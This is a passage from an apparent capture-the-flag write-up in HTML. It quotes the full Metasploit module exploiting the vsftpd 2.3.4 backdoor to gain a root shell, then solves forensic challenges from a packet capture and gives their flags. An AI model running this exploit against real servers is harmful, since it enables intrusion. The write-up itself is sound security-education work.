part of the Metasploit Framework and may be subject to</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token directive keyword\">redistribution</span> <span class=\"token expression\">and commercial restrictions<span class=\"token punctuation\">.</span> Please see the Metasploit</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Framework web site <span class=\"token keyword\">for</span> more information on licensing and terms of use<span class=\"token punctuation\">.</span></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token directive keyword\">http</span><span 
class=\"token expression\"><span class=\"token operator\">:</span></span><span class=\"token comment\">//metasploit.com/framework/</span></span>\n##\n\nrequire <span class=\"token char\">'msf/core'</span>\n\nclass Metasploit3 <span class=\"token operator\">&lt;</span> Msf<span class=\"token operator\">::</span>Exploit<span class=\"token operator\">::</span>Remote\nRank <span class=\"token operator\">=</span> ExcellentRanking\n\ninclude Msf<span class=\"token operator\">::</span>Exploit<span class=\"token operator\">::</span>Remote<span class=\"token operator\">::</span>Tcp\n\ndef <span class=\"token function\">initialize</span><span class=\"token punctuation\">(</span>info <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">super</span><span class=\"token punctuation\">(</span><span class=\"token function\">update_info</span><span class=\"token punctuation\">(</span>info<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Name'</span>           <span class=\"token operator\">=</span><span class=\"token operator\">></span> 'VSFTPD v2<span class=\"token punctuation\">.</span><span class=\"token number\">3.4</span> Backdoor Command Execution'<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Description'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token operator\">%</span>q<span class=\"token punctuation\">{</span>\nThis module exploits a malicious backdoor that was added to theVSFTPD download\narchive<span class=\"token punctuation\">.</span> This backdoor was introdcued into the vsftpd<span class=\"token operator\">-</span><span class=\"token number\">2.3</span><span class=\"token number\">.4</span><span class=\"token punctuation\">.</span>tar<span class=\"token punctuation\">.</span>gz archive between\nJune <span 
class=\"token number\">30</span>th <span class=\"token number\">2011</span> and July <span class=\"token number\">1</span>st <span class=\"token number\">2011</span> according to the most recent information\navailable<span class=\"token punctuation\">.</span> This backdoor was removed on July <span class=\"token number\">3</span>rd <span class=\"token number\">2011.</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Author'</span>         <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token punctuation\">[</span> <span class=\"token char\">'hdm'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'mc'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'License'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span> MSF_LICENSE<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Version'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'$Revision: 13099 $'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'References'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">[</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'URL'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'http://pastebin.com/AetT9sS5'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'URL'</span><span class=\"token punctuation\">,</span> 'http<span class=\"token operator\">:</span><span class=\"token comment\">//scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' 
],</span>\n<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Privileged'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> true<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Platform'</span>       <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token punctuation\">[</span> <span class=\"token char\">'unix'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Arch'</span>           <span class=\"token operator\">=</span><span class=\"token operator\">></span> ARCH_CMD<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Payload'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">{</span>\n<span class=\"token char\">'Space'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">2000</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'BadChars'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DisableNops'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> true<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Compat'</span>      <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">{</span>\n<span class=\"token char\">'PayloadType'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'cmd_interact'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'ConnectionType'</span> <span class=\"token 
operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'find'</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Targets'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">[</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'Automatic'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span> <span class=\"token punctuation\">}</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DisclosureDate'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'Jul 3 2011'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DefaultTarget'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token function\">register_options</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span> Opt<span class=\"token operator\">::</span><span class=\"token function\">RPORT</span><span class=\"token punctuation\">(</span><span class=\"token number\">21</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> self<span class=\"token punctuation\">.</span>class<span class=\"token punctuation\">)</span>\nend\n\ndef exploit\n\nnsock <span class=\"token operator\">=</span> self<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token 
punctuation\">(</span>false<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'RPORT'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">6200</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span> rescue nil\n<span class=\"token keyword\">if</span> nsock\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"The port used by the backdoor bind listener is already open\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>nsock<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Connect to the FTP service port first</span></span>\nconnect\n\nbanner <span class=\"token operator\">=</span> sock<span class=\"token punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Banner: #{banner.strip}\"</span><span class=\"token punctuation\">)</span>\n\nsock<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"USER #{rand_text_alphanumeric(rand(6)+1)}:)\\r\\n\"</span><span class=\"token punctuation\">)</span>\nresp <span class=\"token operator\">=</span> sock<span class=\"token 
punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"USER: #{resp.strip}\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> resp <span class=\"token operator\">=</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span><span class=\"token operator\">^</span><span class=\"token number\">530</span> <span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"This server is configured for anonymous only and the backdoor code cannot be reached\"</span><span class=\"token punctuation\">)</span>\ndisconnect\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token keyword\">if</span> resp <span class=\"token operator\">!</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span><span class=\"token operator\">^</span><span class=\"token number\">331</span> <span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"This server did not respond as expected: #{resp.strip}\"</span><span class=\"token punctuation\">)</span>\ndisconnect\n<span class=\"token keyword\">return</span>\nend\n\nsock<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASS #{rand_text_alphanumeric(rand(6)+1)}\\r\\n\"</span><span class=\"token 
punctuation\">)</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Do not bother reading the response from password<span class=\"token punctuation\">,</span> just try the backdoor</span></span>\nnsock <span class=\"token operator\">=</span> self<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token punctuation\">(</span>false<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'RPORT'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">6200</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span> rescue nil\n<span class=\"token keyword\">if</span> nsock\n<span class=\"token function\">print_good</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Backdoor service has been spawned, handling...\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>nsock<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\ndisconnect\n\nend\n\ndef <span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"id\\n\"</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> s<span class=\"token punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">5</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token keyword\">if</span> r <span class=\"token operator\">!</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span>uid<span class=\"token operator\">=</span><span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"The service on port 6200 does not appear to be a shell\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">disconnect</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token function\">print_good</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"UID: #{r.strip}\"</span><span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"nohup \"</span> <span class=\"token operator\">+</span> payload<span class=\"token punctuation\">.</span>encoded <span class=\"token operator\">+</span> <span class=\"token string\">\" >/dev/null 2>&amp;1\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handler</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\nend\n\nend</code></pre></div>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/17491\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) - Unix remote Exploit</a></p>\n<p>Looking at the code, we can see that the way the attack query sent to the FTP service is constructed, as well as the commands executed after obtaining the shell, match the Metasploit script.</p>\n<h3 id=\"hidden-fileforensic\" style=\"position:relative;\"><a href=\"#hidden-fileforensic\" 
aria-label=\"hidden fileforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Hidden File(Forensic)</h3>\n<blockquote>\n<p>What’s the flag of the hidden file?</p>\n<p>Please use the attachment of the first challenge.</p>\n</blockquote>\n<p>Tracing the series of reverse-shell packets shows that data from a file called <code class=\"language-text\">.Fl4g.tXT</code> was retrieved, as shown below.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">.<span class=\"token punctuation\">]</span><span class=\"token number\">0</span><span class=\"token punctuation\">;</span>root@kctf: /root<span class=\"token punctuation\">..</span><span class=\"token punctuation\">[</span>01<span class=\"token punctuation\">;</span>32mroot@kctf.<span class=\"token punctuation\">[</span>00m:.<span class=\"token punctuation\">[</span>01<span class=\"token punctuation\">;</span>34m/root.<span class=\"token punctuation\">[</span>00m<span class=\"token comment\"># cat .Fl4g.tXT</span>\n<span class=\"token function\">cat</span> .Fl4g.tXT\nHi<span class=\"token operator\">!</span> \nYou<span class=\"token string\">'ve come this far analyzing the file. Good Job. :D \nHere'</span>s something <span class=\"token keyword\">for</span> you. 
Hope you get it<span class=\"token punctuation\">..</span> <span class=\"token punctuation\">;</span>P\n\n37n3vq6rp6k05ov33o5fy5b33sj3rq2sy4p56735853h9</code></pre></div>\n<p>This string, <code class=\"language-text\">37n3vq6rp6k05ov33o5fy5b33sj3rq2sy4p56735853h9</code>, looks suspicious, but on its own there is no way to tell what kind of data it is.</p>\n<p>Judging from other people’s writeups, the intended solution was to guess the encryption scheme that was used.</p>\n<p>If you know the Twin-Hex Cipher, you would probably recognize that the output looks very similar. (I didn’t.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 371px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 84.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/83bdb78cbf124625282a89f5116042f0/8ac56/image-20240122141724219.webp 240w,\n/static/83bdb78cbf124625282a89f5116042f0/65f07/image-20240122141724219.webp 371w\"\n              sizes=\"(max-width: 371px) 100vw, 371px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/83bdb78cbf124625282a89f5116042f0/8ff5a/image-20240122141724219.png 240w,\n/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png 371w\"\n            sizes=\"(max-width: 371px) 100vw, 371px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png\"\n            alt=\"image-20240122141724219\"\n            title=\"image-20240122141724219\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Decoding it on the following site reveals that the correct flag is <code class=\"language-text\">KCTF{ExPloItiNg_S3RvEr_Is_fUN}</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 513px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 80.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4b7f54345912e795d9b36b140474eedf/8ac56/image-20240122141845248.webp 240w,\n/static/4b7f54345912e795d9b36b140474eedf/d3be9/image-20240122141845248.webp 480w,\n/static/4b7f54345912e795d9b36b140474eedf/3be34/image-20240122141845248.webp 513w\"\n              sizes=\"(max-width: 513px) 100vw, 513px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4b7f54345912e795d9b36b140474eedf/8ff5a/image-20240122141845248.png 240w,\n/static/4b7f54345912e795d9b36b140474eedf/e85cb/image-20240122141845248.png 480w,\n/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png 513w\"\n            sizes=\"(max-width: 513px) 100vw, 513px\"\n            type=\"image/png\"\n 
         />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png\"\n            alt=\"image-20240122141845248\"\n            title=\"image-20240122141845248\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.calcresult.com/misc/cyphers/twin-hex.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Twin-Hex Cypher encoder and decoder from CalcResult Universal Calculators</a></p>\n<h3 id=\"confidentialforensic\" style=\"position:relative;\"><a href=\"#confidentialforensic\" aria-label=\"confidentialforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Confidential(Forensic)</h3>\n<blockquote>\n<p>There’s something confidential. 
Can you find it?</p>\n</blockquote>\n<p>Enumerating the HTTP objects shows that a file called <code class=\"language-text\">maybeconfidential.zip</code> was stolen.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 626px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3UlEQVQI1xXJyXKCMAAAUL6kh6oFAglhCwgkMZQ1QdZhGHVse2h79P+Ptdf3NMFOIfZ4wtZxJm4A9npKjuu4HH1i6wCZNjRsBGBTVF0jVS3PrYKmZRv/pTH1HrZp1J3UfWJLZXDs1Yn6XOhYBJJGPQ9U9sRik8mQi7WtrwNf6rQXJne1bKvxh3BvefvY4IW9nDG6cPnYonupL/Fhjg4zeR18+tOFX2X23YnfgdwK/5rvpkDjGYt9QmM6dX3kBdYbSEkyqeGJ0LAwQA6AjoUqUaqqlWVD48TSTQRsB6A/6eg6UaihEeQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/8ac56/image-20240122142146880.webp 240w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/d3be9/image-20240122142146880.webp 480w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/63b03/image-20240122142146880.webp 626w\"\n              sizes=\"(max-width: 626px) 100vw, 626px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/8ff5a/image-20240122142146880.png 240w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/e85cb/image-20240122142146880.png 480w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png 626w\"\n            sizes=\"(max-width: 626px) 100vw, 626px\"\n            type=\"image/png\"\n 
         />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png\"\n            alt=\"image-20240122142146880\"\n            title=\"image-20240122142146880\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Extracting that file reveals a Doc file with an embedded image like the one below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 639px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 132.08333333333334%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAIAAAA44esqAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEaElEQVQ4y2P4DwZ///79/fvP37///vz5++cPnAFCQPbvP3+A6O+/f/+RwI8fPxj+///9/9/vb18///z57cuXj58/f/j86f2/v3/+Y4B///78+/f796+fP75/+fXz2+dPHxn+/37y79fjn18fnjm+7f//d//+vfn//82Lh+c2rZo3pa919ozeE8d2rNm4cPKSibfun/n//+OzJxfOndxy9dyOKxf3M/z/9fjvj4f//79eMKsnJD6wb/XECUv6I7LinWL89dxspNUU5My1xPWUGJgZErJjL1zZe+va3jMn1p05vubSuZ1gzT+Bml89enBRVkuJQUZY0cu0V1N0iix/jIKwrLIMt4gAOw83j7CApoZiVW/FjBkd3b3Vx4+svHJ+N0jzv5+P//999vLJ+bjYEAEDZXNj1c1CHPuF2DZryUWoSYiYaGhrKCpoKGqoKyTGhQPVXzm35eKZjRfPg2x+8uc70OY3EyY0JcaGispKajnolUnypQjyJUcFWSjKhdiZ2Okq2wW6iClLM3Gx2jlaLVs68cjh5RfP7mD4//PJ/z+Pv3++VV6aMXN6m7qqMgMjg7oEl5GIYFNdka2OWp6zVbibvZeXk62TlbiEiIi4SFCYD9Dbl4F+/vfrwf+/j96/uTpnRuvVC7uyMxMykqNrWsujU8KtXKwCXSwXLeivqy5szEl8eHHvggW9hw+uu3/z6KVzmy6cA9r858mPL7fu3jy8YMWUa9f279m+7Pvnu0d2L89KCC7IiI6J8DXWUnGyMZ7YV71l25JZ09punNnx8eNNkJ9Bof336blT2yf1N3R2VM+c3tlQV5KTmeDiYje9pvBadYGjnYUoJ6u5h838ZZNWrprZXFPY2VAysa/+3HGws///efT8yTk/HzdTU72YyMCmmjxnW9PultLEuFBzM2NJHnZBfg4dOcm29NCMWH97RyslNeW66rxbV3ZeOL0NqPnZq+cXktOjXQJcPJysYn1d7ezNHB0tba3NpKQkTHTURDnZLKUlPP1cUoM9g7ycnT0dG1pKLpzacAkU2n+evnp2sboyR1VdKT4+vKezdvHCyV2ddR2tNVMmtZaVZPByc8UnRSYmhPf21AO9Y2qsO6Gn+tyJ9ZfPgvz87NWzC7u2L01OiIiODIyJCU5LiynIS21trqytzndxtWVhYfH2clRXV3Z2tnF0sKoqy1qxZMLpY2tgKezPc2CWuHZx38pl0w7sWdPRVmNjbS4nJ2NgqKOmpiwtLeXoYL100eStGxdsWjfv8rlt1y9tP3d6HTiR/H7+79ezvz+f/v/3FpjO/oHIr6+eX9u0cVF2ZnJZad6mDYtfP78KzE///r3+///96xeXL57fcfXy7utXDgHz818IAhYHwGwMJP/++Q3MvGiZGVgc/AXL/vnzC4iAar59/cLwHxv4B8r1wBLlD5AElTD//mGqgZQkZIJBpfkfNu/h0/wPDIi3E6IYofkHGHz//v3nz58ENQNjFcXZv379AmoD8oEM4p0NAAvZbQbwMYKwAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/8ac56/image-20240122142402072.webp 240w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/d3be9/image-20240122142402072.webp 480w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/d95e5/image-20240122142402072.webp 639w\"\n 
             sizes=\"(max-width: 639px) 100vw, 639px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/8ff5a/image-20240122142402072.png 240w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/e85cb/image-20240122142402072.png 480w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png 639w\"\n            sizes=\"(max-width: 639px) 100vw, 639px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png\"\n            alt=\"image-20240122142402072\"\n            title=\"image-20240122142402072\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I couldn’t find anything even after extracting the image file, so I tried unzipping the Doc file and was able to find a file containing the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 715px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.333333333333336%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAn0lEQVQI13WNTQ4CIQyFOYYzFAK0DDDQAX+i0bhw4977n0ZwNRu/NK+vfUkrztf75fbgdgZQ03SY/jP/ao+oXGqOdeMYo9Ia1EAr0KODAqmgn+1OSalmCXsEIgVukY+cQk0LB0/kMWT0ieIat1PKhQNF8p8Xvp/rmjfm0lrjwsIYY5EsIlpLznY1Y+VMN86NyI3IWZMWExbn+tgfEnX9As/fIF+U0RmUAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f24f3d44d13e974bcd420f34b1880ff4/8ac56/image-20240122142752179.webp 240w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/d3be9/image-20240122142752179.webp 480w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/cb533/image-20240122142752179.webp 715w\"\n              sizes=\"(max-width: 715px) 100vw, 715px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f24f3d44d13e974bcd420f34b1880ff4/8ff5a/image-20240122142752179.png 240w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/e85cb/image-20240122142752179.png 480w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png 715w\"\n            sizes=\"(max-width: 715px) 100vw, 715px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            